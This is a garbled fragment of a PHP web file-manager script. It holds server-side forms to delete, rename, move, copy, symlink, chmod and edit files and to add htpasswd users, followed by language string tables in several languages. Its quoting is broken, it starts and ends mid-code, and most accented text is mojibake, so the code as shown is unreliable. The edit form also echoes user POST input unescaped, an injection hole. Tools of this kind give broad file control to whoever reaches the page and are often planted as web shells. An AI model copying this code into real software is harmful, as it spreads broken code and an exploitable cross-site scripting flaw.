|
' . $src . ' |
|
';
request_dump();
echo "\t" . word('really_delete') . '
';
foreach ($files as $file) {
echo "\t" . html($file) . " <input type="submit" name="no" value="' . word('no') . '" id="red_button"> <input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px"> |
|
<input type="hidden" name="action" value="rename">
<input type="hidden" name="file" value="' . html($file) . '">
<input type="hidden" name="dir" value="' . html($directory) . '">
' . word('rename_file') . '
' . html($file) . ' ' . substr($file, 0, strlen($file) - strlen($name)) . ' <input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '"><input type="submit" value="' . word('rename') . '"> |
|
';
request_dump();
echo "\t" . word('move_files') . '
';
foreach ($files as $file) {
echo "\t" . html($file) . " ' . word('destination') . ': <input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '"> <input type="submit" value="' . word('move') . '"> |
|
';
request_dump();
echo "\n" . word('copy_files') . '
';
foreach ($files as $file) {
echo "\t" . html($file) . " ' . word('destination') . ': <input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '"> <input type="submit" value="' . word('copy') . '"> |
| ' . word('destination') . ': |
' . html($file) . ' <label for="checkbox_relative">' . word('relative') . '</label> <input type="hidden" name="action" value="create_symlink"> <input type="hidden" name="file" value="' . html($file) . '"> <input type="hidden" name="dir" value="' . html($directory) . '"> |
| ' . word('symlink') . ': | <input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '"> <input type="submit" value="' . word('create_symlink') . '"> |
|
' . phrase('permission_for', $file) . '
<input type="submit" name="set" value="' . word('set') . '"> <input type="hidden" name="action" value="permission"> <input type="hidden" name="file" value="' . html($file) . '"> <input type="hidden" name="dir" value="' . html($directory) . '"> |
|
<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" wrap="off">';
if (array_key_exists('content', $_POST)) {
echo $_POST['content'];
} else {
$f = fopen($file, 'r');
while (!feof($f)) {
echo html(fread($f, 8192));
}
fclose($f);
}
if (!empty($_POST['user'])) {
echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
}
if (!empty($_POST['basic_auth'])) {
if ($win) {
$authfile = str_replace('\\', '/', $directory) . $htpasswd;
} else {
$authfile = $directory . $htpasswd;
}
echo "\nAuthType Basic\nAuthName "Restricted Directory"\n";
echo 'AuthUserFile "' . html($authfile) . ""\n";
echo 'Require valid-user';
}
echo '</textarea>
'; if ($apache && basename($file) == $htpasswd) { echo ' ' . word('user') . ': <input type="text" name="user"> ' . word('password') . ': <input type="password" name="password"> <input type="submit" value="' . word('add') . '"> '; } if ($apache && basename($file) == $htaccess) { echo ' <input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '"> '; } echo ' <input type="hidden" name="action" value="edit"> <input type="hidden" name="file" value="' . html($file) . '"> <input type="hidden" name="dir" value="' . html($directory) . '"> <input type="reset" value="' . word('reset') . '" id="red_button"> <input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px"> |
', '}' =>'', '[' => '', ']' => ''); return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase])))); } function getwords ($lang) { global $word_charset, $date_format; switch ($lang) { case 'de': $date_format = 'd.m.y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Verzeichnis', 'file' => 'Datei', 'filename' => 'Dateiname', 'size' => 'GrU?Uƒe', 'permission' => 'Rechte', 'owner' => 'Eigner', 'group' => 'Gruppe', 'other' => 'Andere', 'functions' => 'Funktionen', 'read' => 'lesen', 'write' => 'schreiben', 'execute' => 'ausf?¼hren', 'create_symlink' => 'Symlink erstellen', 'delete' => 'lU?schen', 'rename' => 'umbenennen', 'move' => 'verschieben', 'copy' => 'kopieren', 'edit' => 'editieren', 'download' => 'herunterladen', 'upload' => 'hochladen', 'create' => 'erstellen', 'change' => 'wechseln', 'save' => 'speichern', 'set' => 'setze', 'reset' => 'zur?¼cksetzen', 'relative' => 'Pfad zum Ziel relativ', 'yes' => 'Ja', 'no' => 'Nein', 'back' => 'zur?¼ck', 'destination' => 'Ziel', 'symlink' => 'Symbolischer Link', 'no_output' => 'keine Ausgabe', 'user' => 'Benutzername', 'password' => 'Kennwort', 'add' => 'hinzuf?¼gen', 'add_basic_auth' => 'HTTP-Basic-Auth hinzuf?¼gen', 'uploaded' => '"[%1]" wurde hochgeladen.', 'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.', 'already_exists' => '"[%1]" existiert bereits.', 'created' => '"[%1]" wurde erstellt.', 'not_created' => '"[%1]" konnte nicht erstellt werden.', 'really_delete' => 'Sollen folgende Dateien wirklich gelU?scht werden?', 'deleted' => "Folgende Dateien wurden gelU?scht:\n[%1]", 'not_deleted' => "Folgende Dateien konnten nicht gelU?scht werden:\n[%1]", 'rename_file' => 'Benenne Datei um:', 'renamed' => '"[%1]" wurde in "[%2]" umbenannt.', 'not_renamed' => '"[%1] konnte nicht in "[%2]" umbenannt werden.', 'move_files' => 'Verschieben folgende Dateien:', 'moved' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]", 'not_moved' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]", 'copy_files' => 'Kopiere folgende Dateien:', 'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]", 'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]", 'not_edited' => '"[%1]" kann nicht editiert werden.', 'executed' => "\"[%1]\" wurde erfolgreich ausgef?¼hrt:\n{%2}", 'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgef?¼hrt werden:\n{%2}", 'saved' => '"[%1]" wurde gespeichert.', 'not_saved' => '"[%1]" konnte nicht gespeichert werden.', 'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.', 'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.', 'permission_for' => 'Rechte f?¼r "[%1]":', 'permission_set' => 'Die Rechte f?¼r "[%1]" wurden auf [%2] gesetzt.', 'permission_not_set' => 'Die Rechte f?¼r "[%1]" konnten nicht auf [%2] gesetzt werden.', 'not_readable' => '"[%1]" kann nicht gelesen werden.' ); case 'fr': $date_format = 'd.m.y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'R?©pertoire', 'file' => 'Fichier', 'filename' => 'Nom fichier', 'size' => 'Taille', 'permission' => 'Droits', 'owner' => 'Propri?©taire', 'group' => 'Groupe', 'other' => 'Autres', 'functions' => 'Fonctions', 'read' => 'Lire', 'write' => 'Ecrire', 'execute' => 'Ex?©cuter', 'create_symlink' => 'Cr?©er lien symbolique', 'delete' => 'Effacer', 'rename' => 'Renommer', 'move' => 'D?©placer', 'copy' => 'Copier', 'edit' => 'Ouvrir', 'download' => 'T?©l?©charger sur PC', 'upload' => 'T?©l?©charger sur serveur', 'create' => 'Cr?©er', 'change' => 'Changer', 'save' => 'Sauvegarder', 'set' => 'Ex?©cuter', 'reset' => 'R?©initialiser', 'relative' => 'Relatif', 'yes' => 'Oui', 'no' => 'Non', 'back' => 'Retour', 'destination' => 'Destination', 'symlink' => 'Lien symbollique', 'no_output' => 'Pas de sortie', 'user' => 'Utilisateur', 'password' => 'Mot de passe', 'add' => 'Ajouter', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" a ?©t?© t?©l?©charg?© sur le serveur.', 'not_uploaded' => '"[%1]" n a pas ?©t?© t?©l?©charg?© sur le serveur.', 'already_exists' => '"[%1]" existe d?©j? .', 'created' => '"[%1]" a ?©t?© cr?©?©.', 'not_created' => '"[%1]" n a pas pu ??tre cr?©?©.', 'really_delete' => 'Effacer le fichier?', 'deleted' => "Ces fichiers ont ?©t?© d?©tuits:\n[%1]", 'not_deleted' => "Ces fichiers n ont pu ??tre d?©truits:\n[%1]", 'rename_file' => 'Renomme fichier:', 'renamed' => '"[%1]" a ?©t?© renomm?© en "[%2]".', 'not_renamed' => '"[%1] n a pas pu ??tre renomm?© en "[%2]".', 'move_files' => 'D?©placer ces fichiers:', 'moved' => "Ces fichiers ont ?©t?© d?©plac?©s en \"[%2]\":\n[%1]", 'not_moved' => "Ces fichiers n ont pas pu ??tre d?©plac?©s en \"[%2]\":\n[%1]", 'copy_files' => 'Copier ces fichiers:', 'copied' => "Ces fichiers ont ?©t?© copi?©s en \"[%2]\":\n[%1]", 'not_copied' => "Ces fichiers n ont pas pu ??tre copi?©s en \"[%2]\":\n[%1]", 'not_edited' => '"[%1]" ne peut ??tre ouvert.', 'executed' => "\"[%1]\" a ?©t?© brillamment ex?©cut?© :\n{%2}", 'not_executed' => "\"[%1]\" n a pas pu ??tre ex?©cut?©:\n{%2}", 'saved' => '"[%1]" a ?©t?© sauvegard?©.', 'not_saved' => '"[%1]" n a pas pu ??tre sauvegard?©.', 'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a ?©t?© cr?©e.', 'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu ??tre cr?©?©.', 'permission_for' => 'Droits de "[%1]":', 'permission_set' => 'Droits de "[%1]" ont ?©t?© chang?©s en [%2].', 'permission_not_set' => 'Droits de "[%1]" n ont pas pu ??tre chang?©s en[%2].', 'not_readable' => '"[%1]" ne peut pas ??tre ouvert.' ); case 'it': $date_format = 'd-m-Y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Directory', 'file' => 'File', 'filename' => 'Nome File', 'size' => 'Dimensioni', 'permission' => 'Permessi', 'owner' => 'Proprietario', 'group' => 'Gruppo', 'other' => 'Altro', 'functions' => 'Funzioni', 'read' => 'leggi', 'write' => 'scrivi', 'execute' => 'esegui', 'create_symlink' => 'crea link simbolico', 'delete' => 'cancella', 'rename' => 'rinomina', 'move' => 'sposta', 'copy' => 'copia', 'edit' => 'modifica', 'download' => 'download', 'upload' => 'upload', 'create' => 'crea', 'change' => 'cambia', 'save' => 'salva', 'set' => 'imposta', 'reset' => 'reimposta', 'relative' => 'Percorso relativo per la destinazione', 'yes' => 'Si', 'no' => 'No', 'back' => 'indietro', 'destination' => 'Destinazione', 'symlink' => 'Link simbolico', 'no_output' => 'no output', 'user' => 'User', 'password' => 'Password', 'add' => 'aggiungi', 'add_basic_auth' => 'aggiungi autenticazione base', 'uploaded' => '"[%1]" ?¨ stato caricato.', 'not_uploaded' => '"[%1]" non ?¨ stato caricato.', 'already_exists' => '"[%1]" esiste gi? .', 'created' => '"[%1]" ?¨ stato creato.', 'not_created' => '"[%1]" non ?¨ stato creato.', 'really_delete' => 'Cancello questi file ?', 'deleted' => "Questi file sono stati cancellati:\n[%1]", 'not_deleted' => "Questi file non possono essere cancellati:\n[%1]", 'rename_file' => 'File rinominato:', 'renamed' => '"[%1]" ?¨ stato rinominato in "[%2]".', 'not_renamed' => '"[%1] non ?¨ stato rinominato in "[%2]".', 'move_files' => 'Sposto questi file:', 'moved' => "Questi file sono stati spostati in \"[%2]\":\n[%1]", 'not_moved' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]", 'copy_files' => 'Copio questi file', 'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]", 'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]", 'not_edited' => '"[%1]" non puU? essere modificato.', 'executed' => "\"[%1]\" ?¨ stato eseguito con successo:\n{%2}", 'not_executed' => "\"[%1]\" non ?¨ stato eseguito con successo\n{%2}", 'saved' => '"[%1]" ?¨ stato salvato.', 'not_saved' => '"[%1]" non ?¨ stato salvato.', 'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" ?¨ stato creato.', 'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non ?¨ stato creato.', 'permission_for' => 'Permessi di "[%1]":', 'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].', 'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].', 'not_readable' => '"[%1]" non puU? essere letto.' ); case 'nl': $date_format = 'n/j/y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Directory', 'file' => 'Bestand', 'filename' => 'Bestandsnaam', 'size' => 'Grootte', 'permission' => 'Bevoegdheid', 'owner' => 'Eigenaar', 'group' => 'Groep', 'other' => 'Anderen', 'functions' => 'Functies', 'read' => 'lezen', 'write' => 'schrijven', 'execute' => 'uitvoeren', 'create_symlink' => 'maak symlink', 'delete' => 'verwijderen', 'rename' => 'hernoemen', 'move' => 'verplaatsen', 'copy' => 'kopieren', 'edit' => 'bewerken', 'download' => 'downloaden', 'upload' => 'uploaden', 'create' => 'aanmaken', 'change' => 'veranderen', 'save' => 'opslaan', 'set' => 'instellen', 'reset' => 'resetten', 'relative' => 'Relatief pat naar doel', 'yes' => 'Ja', 'no' => 'Nee', 'back' => 'terug', 'destination' => 'Bestemming', 'symlink' => 'Symlink', 'no_output' => 'geen output', 'user' => 'Gebruiker', 'password' => 'Wachtwoord', 'add' => 'toevoegen', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" is verstuurd.', 'not_uploaded' => '"[%1]" kan niet worden verstuurd.', 'already_exists' => '"[%1]" bestaat al.', 'created' => '"[%1]" is aangemaakt.', 'not_created' => '"[%1]" kan niet worden aangemaakt.', 'really_delete' => 'Deze bestanden verwijderen?', 'deleted' => "Deze bestanden zijn verwijderd:\n[%1]", 'not_deleted' => "Deze bestanden konden niet worden verwijderd:\n[%1]", 'rename_file' => 'Bestandsnaam veranderen:', 'renamed' => '"[%1]" heet nu "[%2]".', 'not_renamed' => '"[%1] kon niet worden veranderd in "[%2]".', 'move_files' => 'Verplaats deze bestanden:', 'moved' => "Deze bestanden zijn verplaatst naar \"[%2]\":\n[%1]", 'not_moved' => "Kan deze bestanden niet verplaatsen naar \"[%2]\":\n[%1]", 'copy_files' => 'Kopieer deze bestanden:', 'copied' => "Deze bestanden zijn gekopieerd naar \"[%2]\":\n[%1]", 'not_copied' => "Deze bestanden kunnen niet worden gekopieerd naar \"[%2]\":\n[%1]", 'not_edited' => '"[%1]" kan niet worden bewerkt.', 'executed' => "\"[%1]\" is met succes uitgevoerd:\n{%2}", 'not_executed' => "\"[%1]\" is niet goed uitgevoerd:\n{%2}", 'saved' => '"[%1]" is opgeslagen.', 'not_saved' => '"[%1]" is niet opgeslagen.', 'symlinked' => 'Symlink van "[%2]" naar "[%1]" is aangemaakt.', 'not_symlinked' => 'Symlink van "[%2]" naar "[%1]" is niet aangemaakt.', 'permission_for' => 'Bevoegdheid voor "[%1]":', 'permission_set' => 'Bevoegdheid van "[%1]" is ingesteld op [%2].', 'permission_not_set' => 'Bevoegdheid van "[%1]" is niet ingesteld op [%2].', 'not_readable' => '"[%1]" kan niet worden gelezen.' ); case 'se': $date_format = 'n/j/y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Mapp', 'file' => 'Fil', 'filename' => 'Filnamn', 'size' => 'Storlek', 'permission' => 'SU†kerhetsnivU‡', 'owner' => '?¤gare', 'group' => 'Grupp', 'other' => 'Andra', 'functions' => 'Funktioner', 'read' => 'LU†s', 'write' => 'Skriv', 'execute' => 'UtfU?r', 'create_symlink' => 'Skapa symlink', 'delete' => 'Radera', 'rename' => 'Byt namn', 'move' => 'Flytta', 'copy' => 'Kopiera', 'edit' => '?¤ndra', 'download' => 'Ladda ner', 'upload' => 'Ladda upp', 'create' => 'Skapa', 'change' => '?¤ndra', 'save' => 'Spara', 'set' => 'Markera', 'reset' => 'TU?m', 'relative' => 'Relative path to target', 'yes' => 'Ja', 'no' => 'Nej', 'back' => 'Tillbaks', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'no output', 'user' => 'AnvU†ndare', 'password' => 'LU?senord', 'add' => 'LU†gg till', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" har laddats upp.', 'not_uploaded' => '"[%1]" kunde inte laddas upp.', 'already_exists' => '"[%1]" finns redan.', 'created' => '"[%1]" har skapats.', 'not_created' => '"[%1]" kunde inte skapas.', 'really_delete' => 'Radera dessa filer?', 'deleted' => "De hU†r filerna har raderats:\n[%1]", 'not_deleted' => "Dessa filer kunde inte raderas:\n[%1]", 'rename_file' => 'Byt namn pU‡ fil:', 'renamed' => '"[%1]" har bytt namn till "[%2]".', 'not_renamed' => '"[%1] kunde inte dU?pas om till "[%2]".', 'move_files' => 'Flytta dessa filer:', 'moved' => "Dessa filer har flyttats till \"[%2]\":\n[%1]", 'not_moved' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]", 'copy_files' => 'Kopiera dessa filer:', 'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]", 'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]", 'not_edited' => '"[%1]" kan inte U†ndras.', 'executed' => "\"[%1]\" har utfU?rts:\n{%2}", 'not_executed' => "\"[%1]\" kunde inte utfU?ras:\n{%2}", 'saved' => '"[%1]" har sparats.', 'not_saved' => '"[%1]" kunde inte sparas.', 'symlinked' => 'Symlink frU‡n "[%2]" till "[%1]" har skapats.', 'not_symlinked' => 'Symlink frU‡n "[%2]" till "[%1]" kunde inte skapas.', 'permission_for' => 'RU†ttigheter fU?r "[%1]":', 'permission_set' => 'RU†ttigheter fU?r "[%1]" U†ndrades till [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" kan inte lU†sas.' ); case 'sp': $date_format = 'j/n/y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Directorio', 'file' => 'Archivo', 'filename' => 'Nombre Archivo', 'size' => 'TamaUŒo', 'permission' => 'Permisos', 'owner' => 'Propietario', 'group' => 'Grupo', 'other' => 'Otros', 'functions' => 'Funciones', 'read' => 'lectura', 'write' => 'escritura', 'execute' => 'ejecuciU?n', 'create_symlink' => 'crear enlace', 'delete' => 'borrar', 'rename' => 'renombrar', 'move' => 'mover', 'copy' => 'copiar', 'edit' => 'editar', 'download' => 'bajar', 'upload' => 'subir', 'create' => 'crear', 'change' => 'cambiar', 'save' => 'salvar', 'set' => 'setear', 'reset' => 'resetear', 'relative' => 'Path relativo', 'yes' => 'Si', 'no' => 'No', 'back' => 'atrU„s', 'destination' => 'Destino', 'symlink' => 'Enlace', 'no_output' => 'sin salida', 'user' => 'Usuario', 'password' => 'Clave', 'add' => 'agregar', 'add_basic_auth' => 'agregar autentificaciU?n bU„sica', 'uploaded' => '"[%1]" ha sido subido.', 'not_uploaded' => '"[%1]" no pudo ser subido.', 'already_exists' => '"[%1]" ya existe.', 'created' => '"[%1]" ha sido creado.', 'not_created' => '"[%1]" no pudo ser creado.', 'really_delete' => '??Borra estos archivos?', 'deleted' => "Estos archivos han sido borrados:\n[%1]", 'not_deleted' => "Estos archivos no pudieron ser borrados:\n[%1]", 'rename_file' => 'Renombra archivo:', 'renamed' => '"[%1]" ha sido renombrado a "[%2]".', 'not_renamed' => '"[%1] no pudo ser renombrado a "[%2]".', 'move_files' => 'Mover estos archivos:', 'moved' => "Estos archivos han sido movidos a \"[%2]\":\n[%1]", 'not_moved' => "Estos archivos no pudieron ser movidos a \"[%2]\":\n[%1]", 'copy_files' => 'Copiar estos archivos:', 'copied' => "Estos archivos han sido copiados a \"[%2]\":\n[%1]", 'not_copied' => "Estos archivos no pudieron ser copiados \"[%2]\":\n[%1]", 'not_edited' => '"[%1]" no pudo ser editado.', 'executed' => "\"[%1]\" ha sido ejecutado correctamente:\n{%2}", 'not_executed' => "\"[%1]\" no pudo ser ejecutado correctamente:\n{%2}", 'saved' => '"[%1]" ha sido salvado.', 'not_saved' => '"[%1]" no pudo ser salvado.', 'symlinked' => 'Enlace desde "[%2]" a "[%1]" ha sido creado.', 'not_symlinked' => 'Enlace desde "[%2]" a "[%1]" no pudo ser creado.', 'permission_for' => 'Permisos de "[%1]":', 'permission_set' => 'Permisos de "[%1]" fueron seteados a [%2].', 'permission_not_set' => 'Permisos de "[%1]" no pudo ser seteado a [%2].', 'not_readable' => '"[%1]" no pudo ser leU?do.' ); case 'dk': $date_format = 'n/j/y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Mappe', 'file' => 'Fil', 'filename' => 'Filnavn', 'size' => 'StU‘rrelse', 'permission' => 'Rettighed', 'owner' => 'Ejer', 'group' => 'Gruppe', 'other' => 'Andre', 'functions' => 'Funktioner', 'read' => 'lUˆs', 'write' => 'skriv', 'execute' => 'kU‘r', 'create_symlink' => 'opret symbolsk link', 'delete' => 'slet', 'rename' => 'omdU‘b', 'move' => 'flyt', 'copy' => 'kopier', 'edit' => 'rediger', 'download' => 'download', 'upload' => 'upload', 'create' => 'opret', 'change' => 'skift', 'save' => 'gem', 'set' => 'sUˆt', 'reset' => 'nulstil', 'relative' => 'Relativ sti til valg', 'yes' => 'Ja', 'no' => 'Nej', 'back' => 'tilbage', 'destination' => 'Distination', 'symlink' => 'Symbolsk link', 'no_output' => 'ingen resultat', 'user' => 'Bruger', 'password' => 'Kodeord', 'add' => 'tilfU‘j', 'add_basic_auth' => 'tilfU‘j grundliggende rettigheder', 'uploaded' => '"[%1]" er blevet uploaded.', 'not_uploaded' => '"[%1]" kunnu ikke uploades.', 'already_exists' => '"[%1]" findes allerede.', 'created' => '"[%1]" er blevet oprettet.', 'not_created' => '"[%1]" kunne ikke oprettes.', 'really_delete' => 'Slet disse filer?', 'deleted' => "Disse filer er blevet slettet:\n[%1]", 'not_deleted' => "Disse filer kunne ikke slettes:\n[%1]", 'rename_file' => 'OmdU‘d fil:', 'renamed' => '"[%1]" er blevet omdU‘bt til "[%2]".', 'not_renamed' => '"[%1] kunne ikke omdU‘bes til "[%2]".', 'move_files' => 'Flyt disse filer:', 'moved' => "Disse filer er blevet flyttet til \"[%2]\":\n[%1]", 'not_moved' => "Disse filer kunne ikke flyttes til \"[%2]\":\n[%1]", 'copy_files' => 'Kopier disse filer:', 'copied' => "Disse filer er kopieret til \"[%2]\":\n[%1]", 'not_copied' => "Disse filer kunne ikke kopieres til \"[%2]\":\n[%1]", 'not_edited' => '"[%1]" kan ikke redigeres.', 'executed' => "\"[%1]\" er blevet kU‘rt korrekt:\n{%2}", 'not_executed' => "\"[%1]\" kan ikke kU‘res korrekt:\n{%2}", 'saved' => '"[%1]" er blevet gemt.', 'not_saved' => '"[%1]" kunne ikke gemmes.', 'symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" er blevet oprettet.', 'not_symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" kunne ikke oprettes.', 'permission_for' => 'Rettigheder for "[%1]":', 'permission_set' => 'Rettigheder for "[%1]" blev sat til [%2].', 'permission_not_set' => 'Rettigheder for "[%1]" kunne ikke sUˆttes til [%2].', 'not_readable' => '"[%1]" Kan ikke lUˆses.' ); case 'tr': $date_format = 'n/j/y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'KlasU?r', 'file' => 'Dosya', 'filename' => 'dosya adi', 'size' => 'boyutu', 'permission' => 'Izin', 'owner' => 'sahib', 'group' => 'Grup', 'other' => 'Digerleri', 'functions' => 'Fonksiyonlar', 'read' => 'oku', 'write' => 'yaz', 'execute' => '?§alistir', 'create_symlink' => 'yarat symlink', 'delete' => 'sil', 'rename' => 'ad degistir', 'move' => 'tasi', 'copy' => 'kopyala', 'edit' => 'd?¼zenle', 'download' => 'indir', 'upload' => 'y?¼kle', 'create' => 'create', 'change' => 'degistir', 'save' => 'kaydet', 'set' => 'ayar', 'reset' => 'sifirla', 'relative' => 'Hedef yola gU?re', 'yes' => 'Evet', 'no' => 'Hayir', 'back' => 'Geri', 'destination' => 'Hedef', 'symlink' => 'Kâ€?sa yol', 'no_output' => '?§ikti yok', 'user' => 'Kullanici', 'password' => 'Sifre', 'add' => 'ekle', 'add_basic_auth' => 'ekle basit-authentification', 'uploaded' => '"[%1]" y?¼klendi.', 'not_uploaded' => '"[%1]" y?¼klenemedi.', 'already_exists' => '"[%1]" kullanilmakta.', 'created' => '"[%1]" olusturuldu.', 'not_created' => '"[%1]" olusturulamadi.', 'really_delete' => 'Bu dosyalari silmek istediginizden eminmisiniz?', 'deleted' => "Bu dosyalar silindi:\n[%1]", 'not_deleted' => "Bu dosyalar silinemedi:\n[%1]", 'rename_file' => 'Adi degisen dosya:', 'renamed' => '"[%1]" adili dosyanin yeni adi "[%2]".', 'not_renamed' => '"[%1] adi degistirilemedi "[%2]" ile.', 'move_files' => 'Tasinan dosyalar:', 'moved' => "Bu dosyalari tasidiginiz yer \"[%2]\":\n[%1]", 'not_moved' => "Bu dosyalari tasiyamadiginiz yer \"[%2]\":\n[%1]", 'copy_files' => 'Kopyalanan dosyalar:', 'copied' => "Bu dosyalar kopyalandi \"[%2]\":\n[%1]", 'not_copied' => "Bu dosyalar kopyalanamiyor \"[%2]\":\n[%1]", 'not_edited' => '"[%1]" d?¼zenlenemiyor.', 'executed' => "\"[%1]\" basariyla ?§alistirildi:\n{%2}", 'not_executed' => "\"[%1]\" ?§alistirilamadi:\n{%2}", 'saved' => '"[%1]" kaydedildi.', 'not_saved' => '"[%1]" kaydedilemedi.', 'symlinked' => '"[%2]" den "[%1]" e kâ€?sayol oluâ€?turuldu.', 'not_symlinked' => '"[%2]"den "[%1]" e kâ€?sayol oluâ€?turulamadâ€?.', 'permission_for' => 'Izinler "[%1]":', 'permission_set' => 'Izinler "[%1]" degistirildi [%2].', 'permission_not_set' => 'Izinler "[%1]" degistirilemedi [%2].', 'not_readable' => '"[%1]" okunamiyor.' ); case 'cs': $date_format = 'd.m.y H:i:s'; $word_charset = 'UTF-8'; return array( 'directory' => 'Adres?£?Œ?¥â„¢', 'file' => 'Soubor', 'filename' => 'Jm?£A©no souboru', 'size' => 'Velikost', 'permission' => 'Pr?£?Œva', 'owner' => 'Vlastn?£Ak', 'group' => 'Skupina', 'other' => 'Ostatn?£A', 'functions' => 'Funkce', 'read' => '?¤?’ten?£A', 'write' => 'Z?£?Œpis', 'execute' => 'Spou?¥?Œt?¤â€?n?£A', 'create_symlink' => 'Vytvo?¥â„¢it symbolick?£A½ odkaz', 'delete' => 'Smazat', 'rename' => 'P?¥â„¢ejmenovat', 'move' => 'P?¥â„¢esunout', 'copy' => 'Zkop?£Arovat', 'edit' => 'Otev?¥â„¢?£At', 'download' => 'St?£?Œhnout', 'upload' => 'Nahraj na server', 'create' => 'Vytvo?¥â„¢it', 'change' => 'Zm?¤â€?nit', 'save' => 'Ulo?¥A¾it', 'set' => 'Nastavit', 'reset' => 'zp?¤â€?t', 'relative' => 'Relatif', 'yes' => 'Ano', 'no' => 'Ne', 'back' => 'Zp?¤â€?t', 'destination' => 'Destination', 'symlink' => 'Symbolick?£A½ odkaz', 'no_output' => 'Pr?£?Œzdn?£A½ v?£A½stup', 'user' => 'U?¥A¾ivatel', 'password' => 'Heslo', 'add' => 'P?¥â„¢idat', 'add_basic_auth' => 'p?¥â„¢idej z?£?Œkladn?£A autentizaci', 'uploaded' => 'Soubor "[%1]" byl nahr?£?Œn na server.', 'not_uploaded' => 'Soubor "[%1]" nebyl nahr?£?Œn na server.', 'already_exists' => 'Soubor "[%1]" u?¥A¾ exituje.', 'created' => 'Soubor "[%1]" byl vytvo?¥â„¢en.', 'not_created' => 'Soubor "[%1]" nemohl b?£A½t vytvo?¥â„¢en.', 'really_delete' => 'Vymazat soubor?', 'deleted' => "Byly vymaz?£?Œny tyto soubory:\n[%1]", 'not_deleted' => "Tyto soubory nemohly b?£A½t vytvo?¥â„¢eny:\n[%1]", 'rename_file' => 'P?¥â„¢ejmenuj soubory:', 'renamed' => 'Soubor "[%1]" byl p?¥â„¢ejmenov?£?Œn na "[%2]".', 'not_renamed' => 'Soubor "[%1]" nemohl b?£A½t p?¥â„¢ejmenov?£?Œn na "[%2]".', 'move_files' => 'P?¥â„¢em?£Astit tyto soubory:', 'moved' => "Tyto soubory byly p?¥â„¢em?£Ast?¤â€?ny do \"[%2]\":\n[%1]", 'not_moved' => "Tyto soubory nemohly b?£A½t p?¥â„¢em?£Ast?¤â€?ny do \"[%2]\":\n[%1]", 'copy_files' => 'Zkop?£Arovat tyto soubory:', 'copied' => "Tyto soubory byly zkop?£Arov?£?Œny do \"[%2]\":\n[%1]", 'not_copied' => "Tyto soubory nemohly b?£A½t zkop?£Arov?£?Œny do \"[%2]\":\n[%1]", 'not_edited' => 'Soubor "[%1]" nemohl b?£A½t otev?¥â„¢en.', 'executed' => "SOubor \"[%1]\" byl spu?¥?Œt?¤â€?n :\n{%2}", 'not_executed' => "Soubor \"[%1]\" nemohl b?£A½t spu?¥?Œt?¤â€?n:\n{%2}", 'saved' => 'Soubor "[%1]" byl ulo?¥A¾en.', 'not_saved' => 'Soubor "[%1]" nemohl b?£A½t ulo?¥A¾en.', 'symlinked' => 'Byl vyvo?¥â„¢en symbolick?£A½ odkaz "[%2]" na soubor "[%1]".', 'not_symlinked' => 'Symbolick?£A½ odkaz "[%2]" na soubor "[%1]" nemohl b?£A½t vytvo?¥â„¢en.', 'permission_for' => 'Pr?£?Œva k "[%1]":', 'permission_set' => 'Pr?£?Œva k "[%1]" byla zm?¤â€?n?¤â€?na na [%2].', 'permission_not_set' => 'Pr?£?Œva k "[%1]" nemohla b?£A½t zm?¤â€?n?¤â€?na na [%2].', 'not_readable' => 'Soubor "[%1]" nen?£A mo?¥A¾no p?¥â„¢e?¤?†?£Ast.' ); case 'en': default: $date_format = 'n/j/y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Directory', 'file' => 'File', 'filename' => 'Filename', 'size' => 'Size', 'permission' => 'Permission', 'owner' => 'Owner', 'group' => 'Group', 'other' => 'Others', 'functions' => 'Functions', 'read' => 'read', 'write' => 'write', 'execute' => 'execute', 